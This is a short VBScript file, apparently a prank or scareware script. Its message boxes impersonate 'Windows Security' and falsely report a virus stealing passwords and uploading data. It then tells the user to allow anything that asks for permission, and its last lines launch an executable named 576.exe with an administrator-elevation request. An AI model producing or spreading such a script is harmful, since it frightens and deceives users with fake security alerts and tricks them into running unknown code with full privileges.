X=MsgBox("Failed to open file Computer. Do you want to fix it?",4+64,"Computer") 
X=MsgBox("Failed to fix file Computer. Do you want to scan your computer?",3+48,"Error")
X=MsgBox("Virus Detected! Remove Now?",3+48,"Windows Security") 
X=MsgBox("Failed to remove virus",0+16,"Windows Security") 
X=MsgBox("Virus Started",1+64,"iluvu.v2.4") 
X=MsgBox("Stealing user passwords on this machine. Cancel?",3+32,"iluvu.v2.4") 
X=MsgBox("Finished stealing passwords.",0+64,"iluvu.v2.4") 
X=MsgBox("Stealing user data. Cancel?",3+32,"iluvu.v2.4") 
X=MsgBox("Finished stealing data.",0+64,"iluvu.v2.4") 
X=MsgBox("Uploading stolen data to iluvu database. Cancel?",3+32,"iluvu.v2.4")
X=MsgBox("Finished uploading files to database.",0+64,"iluvu.v2.4") 
X=MsgBox("Successfully stolen critical data. Shutdown?",3+32,"iluvu.v2.4") 
X=MsgBox("Shutting Down. Have a great day!",0+64,"iluvu.v2.4") 
X=MsgBox("Prevent virus from shutting down computer?",4+48,"Windows Security") 
X=MsgBox("To prevent virus from shutting down computer, give anything that pops up permission to run.",0+64,"Windows Security") 
Set objAPP = CreateObject("Shell.Application")
objAPP.ShellExecute "576.exe",,,"runas",1